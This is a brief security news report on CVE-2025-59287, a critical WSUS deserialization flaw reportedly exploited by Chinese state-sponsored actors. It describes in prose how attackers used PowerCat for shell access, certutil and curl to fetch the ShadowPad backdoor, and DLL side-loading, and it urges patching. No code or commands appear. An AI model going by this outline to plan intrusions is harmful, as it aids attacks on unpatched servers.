Security researchers warn that a vulnerability in Windows Server Update Services (WSUS) is being actively exploited by Chinese state-sponsored threat actors to spread malware globally. This vulnerability, identified as CVE-2025-59287, has a severity score of 9.8/10 and allows remote code execution without user interaction.
CVE-2025-59287 Details
The flaw is a deserialization-of-untrusted-data bug that permits attackers to execute code with SYSTEM privileges. Microsoft addressed the vulnerability in its October 2025 Patch Tuesday update following a public proof-of-concept release.
- The vulnerability was given a 9.8 severity score.
- Allows unauthenticated remote code execution.
- Patch released in October 2025 by Microsoft.
Attack Methods and Targets
AhnLab Security Intelligence Center revealed that attackers use PowerCat, an open-source PowerShell utility, to gain system shell access on unpatched WSUS servers. They subsequently download and install ShadowPad, a modular backdoor, leveraging tools like certutil and curl.
ShadowPad is deployed via DLL side-loading using a legitimate executable named ETDCtrlHelper.exe. The primary targets include sectors such as government, defense, and telecommunications.
Preventive Measures
The exploitation began after the public release of PoC exploit code, leading to quick weaponization by attackers. Administrators are urged to patch WSUS servers promptly to mitigate this critical vulnerability effectively.
This attack underscores the importance of maintaining updated security measures, especially for critical systems that serve sensitive infrastructure sectors worldwide.
